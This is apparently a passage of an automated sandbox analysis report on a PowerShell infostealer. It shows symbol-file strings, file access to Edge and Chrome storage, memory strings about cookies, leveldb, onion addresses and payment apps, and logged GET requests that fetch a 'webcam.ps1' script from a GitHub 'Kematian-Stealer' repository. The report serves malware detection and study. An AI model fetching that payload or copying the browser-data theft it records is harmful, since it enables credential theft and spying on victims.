            Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:63777 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:63778 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:63780 version: TLS 1.2
            Source: Binary string: lambda_methodNet.Http.pdb source: powershell.exe, 00000028.00000002.2902014674.0000017E80199000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: powershell.exe, 00000030.00000002.2347663937.000000C000498000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Net.Http.pdb2"{ source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: winload_prod.pdbacroNGLLog.txt source: powershell.exe, 00000030.00000002.2331375157.000000C0002C4000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbV_ source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ement.Automationp.pdby source: powershell.exe, 00000028.00000002.2914373114.0000017E803EC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2347720192.000000C0004AA000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2331375157.000000C000006000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: winload_prod.pdbDD2-7850-423A-B1D8-7882CE1A6D15.log source: powershell.exe, 00000030.00000002.2347720192.000000C0004AA000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2909000081.0000017E802B9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Net.Http.pdb source: powershell.exe, 00000028.00000002.2916812846.0000017E804BB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: powershell.exe, 00000030.00000002.2331375157.000000C000136000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: powershell.exe, 00000030.00000002.2345550660.000000C00041E000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ws\dll\System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.pdbhP source: powershell.exe, 0000002C.00000002.2105443989.00000201CC1ED000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: grule230174v0.xmlrule230200v0.xmlrule700000v2.xmlrule700001v2.xmlrule700050v1.xmlrule700051v1.xmlrule700100v1.xmlrule700101v1.xmlrule700150v1.xmlrule700151v1.xmlrule700200v1.xmlrule700201v1.xmlrule700250v1.xmlrule700251v1.xmlrule700300v1.xmlrule700301v1.xmlrule700350v1.xmlrule700351v1.xmlrule700400v2.xmlrule700401v2.xmlrule700450v1.xmlrule700451v1.xmlrule700500v1.xmlrule700501v1.xmlrule700550v1.xmlrule700551v1.xmlrule700600v1.xmlrule700601v1.xmlrule700650v1.xmlrule700651v1.xmlrule700700v1.xmlrule700701v1.xmlC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\Settings\C:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\Settings\C:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\TempStateC:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbweC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\TempC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppDataC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbweC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\ACC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SettingsC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SettingsC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SettingsC:\Users\user\AppData\Local\Packages\microsoft.windowscom
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: powershell.exe, 00000030.00000002.2331375157.000000C00007A000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbpX source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: powershell.exe, 00000030.00000002.2331375157.000000C000116000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2913711365.0000017E803CB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Net.Http\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.Http.pdb~ source: powershell.exe, 00000028.00000002.2916812846.0000017E804A6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ws\dll\System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: $C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\TempC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AppDataC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbC:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logC:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.logr source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C0002FE000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Net.Http.pdbtract source: powershell.exe, 00000028.00000002.2913711365.0000017E803CB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: pingme.txtntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000006000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000028.00000002.2914373114.0000017E803EC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdboAqN:: source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: p.pdb source: powershell.exe, 0000002C.00000002.2215777823.00000201E2FED000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: edbtmp.logIndexedDB.edbIndexedDB.jfmAppIconCacheConstraintIndexFlighting100ShellFeeds308046B0AF4A39CBChromeMSEdgeApps.ftApps.ftApps.indexApps.indexApps.ftapps.csgApps.indexapps.schemaACappsglobals.txtappssynonyms.txtsettings.csgsettings.schemaSettings.ftSettings.indexSettings.ftSettings.indexGLEAM-DARK.svgGLEAM-LIGHT.svgroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryACAppDataLocalCacheLocalStateRoamingStateSettingsTempACSystemAppDataTempStateINetCacheINetCookiesINetHistoryroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryMicrosoftcontainer.datESEcontainer.datCryptnetUrlCacheContentMetaDataroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryACAppDataLocalCacheLocalStateRoamingStateSettingsTempACSystemAppDataTempStateINetCacheINetCookiesINetHistoryAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryroaming.lockACsettings.datroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateACAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryINetCacheTempINetCookiesINetHistoryroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryHxStore.hxdACroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateACroaming.locksettings.datINetCacheTempINetCookiesINetHistoryEXCELpingme.txtntkrnlmp.pdbwinload_prod.pdbdownload.errorntkrnlmp.pdbReadFile source: powershell.exe, 00000030.00000002.2331375157.000000C000006000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbgAyN; source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: powershell.exe, 00000030.00000002.2331375157.000000C0002FE000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ings source: powershell.exe, 00000030.00000002.2633346989.000002A872B26000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Net.Http.pdbmt"i source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: n.pdbWF source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: winload_prod.pdbdownload.error source: powershell.exe, 00000030.00000002.2331375157.000000C000006000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: WINLOA~1.PDB3( source: powershell.exe, 00000030.00000002.2347720192.000000C0004AA000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\FontsC:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\LicensesC:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\C:\Users\user\AppData\Local\SolidDocumentsC:\Users\user\AppData\Local\Temp{03477411-EFD2-45F5-9977-8217BABEF128} - OProcSessId.dat{39FD46B1-FE63-43EB-8B40-445FD746DDBB} - OProcSessId.dat{68EB49F3-8C14-4F42-9AAA-8A4F03F41DF8} - OProcSessId.dat{6E005F86-FF04-4920-857F-6AD6E14B3DC3} - OProcSessId.dat{A3E94280-ADEA-4163-99A3-23DF2BB55BDB} - OProcSessId.datC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\C:\Users\user\AppData\Local\Temp\acrobat_sbx\Adobe\AcrobatC:\Users\user\AppData\Local\Temp\acrobat_sbx\Adobe\Acrobat\DCNGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.logNGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.logC:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeC:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\C:\Users\user\AppData\Local\Temporary Internet FilesC:\Users\user\AppData\Local\VirtualStoreC:\Users\user\AppData\Local\_curlrcC:\Users\user\AppData\Local\Google\Chrome\User Data\Default\C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\--09AZ__az--09AZ__az--09AZ__azdQw4w9WgXcQ:C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\--09AZ__az--09AZ__az--09AZ__azdQw4w9WgXcQ:nullHARDWARE_ACCELERATION_MODE_PREVIOUSVARIATIONS_FAILED_TO_FETCH_SEED_STREAKVARIATIONS_PERMANENT_CONSISTENCY_COUNTRYVARIATIONS_SAFE_SEED_PERMANENT_CONSISTENCY_COUNTRYVARIATIONS_SAFE_SEED_SESSION_CONSISTENCY_COUNTRY source: powershell.exe, 00000030.00000002.2345550660.000000C00041E000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SettingsC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SystemAppDataC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\TempStateC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\ACC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\BackgroundTransferApiC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCacheC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCookiesC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalCacheC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalStateC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\RoamingStateC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\roaming.lockC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.datC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG1C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG2C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SystemAppDataC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\TempStateC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\AppDataC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalCacheC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalStateC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\RoamingStateC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SettingsC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\roaming.lockC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.datC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SystemAppDataC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\TempStateC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C0002FE000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.pdb source: powershell.exe, 0000002C.00000002.2105443989.00000201CC1ED000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def

            Networking

            barindex
            Found Tor onion address
            Source: powershell.exe, 00000030.00000002.2770545725.000002A8743F3000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: unixxn--cap -> failermssse3avx2bmi1bmi2bitsNameTypeasn1cx16sse2*.ldb*.logchdir<nil>writechmodchowncloseLstatfalseBEGIN_auth_syncfile:FALSEarrayError&amp;&#34;&#39;https:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFounddefersweeptestRtestWexecWexecRschedhchansudoggscanmheaptracepanicsleepgcingusagefault and [...]ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalint16int32int64uint8slicekind=1562578125parsexxxxxGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamiltls: Earlyfilesimap2imap3imapspop3shostsutf-8%s*%dtext/bad nmatchrune Ints:Ptrs:sse41sse42ssse3SHA-1P-224P-256P-384P-521ECDSA (at no IPClassPayPalreadatremoveCOMMITNORMAL_mutexDOUBLEobjectnumberstringStringFormat[]byteactiveclosedsocks5CANCELGOAWAYPADDEDBasic CookieacceptcookieexpectoriginserverExpectstatusPragmasocks LockedGetACPsysmontimersefenceselect, not GOROOTlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minuteseconduint16uint32uint64structchan<-<-chan Value390625, val CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiX25519%w%.0wAcceptServernetdnsdomaingophertelnet.localreturn.onionip+netempty rune1 rdtscppopcntcmd/goheaderAnswerLengthSTREETavx512rdrandrdseedDefaultProfileNetworkCookiesHistoryAPPDATAleveldbCashappreaddirwriteatconsolesqlite3DEFAULT_txlock_vacuum_cslikeDECIMAL\\.\UNCnumber float32float64UpgradeTrailerHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTforcegcallocmWcpuprofallocmRunknowngctraceIO waitUNKNOWN:eventsCopySidWSARecvWSASendconnectTuesdayJanuaryOctoberMUI_StdMUI_DltinvaliduintptrSwapperChanDir using , type= Value>Convert19531259765625nil keyAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaderivedInitialExpiresSubjectwindowswsarecvwsasendlookup writetocharsetInstAltInstNopalt -> nop -> any -> Floats:avx512fos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:::ffff:no portanswers2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsave#internWeb Data.defaultIdk LmaotruncateFullPathnil PoolROLLBACK_timeout_journal_lockingGoStringhijackedNO_ERRORPRIORITYSETTINGSLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0boundaryHTTP/1.1no-cacheContinueAcceptedConflictbad instscavengepollDesctraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKno anodeCancelIoReadFileAcceptExWSAIoctlshutdownwsaioctlacceptexThursdaySaturdayFebruaryNovemberDecember%!Month(ZONEINFOSnapshotFuncTypestruct {48828125infinitystrconv.parsing ParseIntArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiCurveID(f
            Source: powershell.exe, 00000030.00000002.2690768710.000002A873850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: unixxn--cap -> failermssse3avx2bmi1bmi2bitsNameTypeasn1cx16sse2*.ldb*.logchdir<nil>writechmodchowncloseLstatfalseBEGIN_auth_syncfile:FALSEarrayError&amp;&#34;&#39;https:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFounddefersweeptestRtestWexecWexecRschedhchansudoggscanmheaptracepanicsleepgcingusagefault and [...]ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalint16int32int64uint8slicekind=1562578125parsexxxxxGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamiltls: Earlyfilesimap2imap3imapspop3shostsutf-8%s*%dtext/bad nmatchrune Ints:Ptrs:sse41sse42ssse3SHA-1P-224P-256P-384P-521ECDSA (at no IPClassPayPalreadatremoveCOMMITNORMAL_mutexDOUBLEobjectnumberstringStringFormat[]byteactiveclosedsocks5CANCELGOAWAYPADDEDBasic CookieacceptcookieexpectoriginserverExpectstatusPragmasocks LockedGetACPsysmontimersefenceselect, not GOROOTlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minuteseconduint16uint32uint64structchan<-<-chan Value390625, val CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiX25519%w%.0wAcceptServernetdnsdomaingophertelnet.localreturn.onionip+netempty rune1 rdtscppopcntcmd/goheaderAnswerLengthSTREETavx512rdrandrdseedDefaultProfileNetworkCookiesHistoryAPPDATAleveldbCashappreaddirwriteatconsolesqlite3DEFAULT_txlock_vacuum_cslikeDECIMAL\\.\UNCnumber float32float64UpgradeTrailerHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTforcegcallocmWcpuprofallocmRunknowngctraceIO waitUNKNOWN:eventsCopySidWSARecvWSASendconnectTuesdayJanuaryOctoberMUI_StdMUI_DltinvaliduintptrSwapperChanDir using , type= Value>Convert19531259765625nil keyAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaderivedInitialExpiresSubjectwindowswsarecvwsasendlookup writetocharsetInstAltInstNopalt -> nop -> any -> Floats:avx512fos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:::ffff:no portanswers2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsave#internWeb Data.defaultIdk LmaotruncateFullPathnil PoolROLLBACK_timeout_journal_lockingGoStringhijackedNO_ERRORPRIORITYSETTINGSLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0boundaryHTTP/1.1no-cacheContinueAcceptedConflictbad instscavengepollDesctraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKno anodeCancelIoReadFileAcceptExWSAIoctlshutdownwsaioctlacceptexThursdaySaturdayFebruaryNovemberDecember%!Month(ZONEINFOSnapshotFuncTypestruct {48828125infinitystrconv.parsing ParseIntArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiCurveID(f
            Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1 HTTP/1.1Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
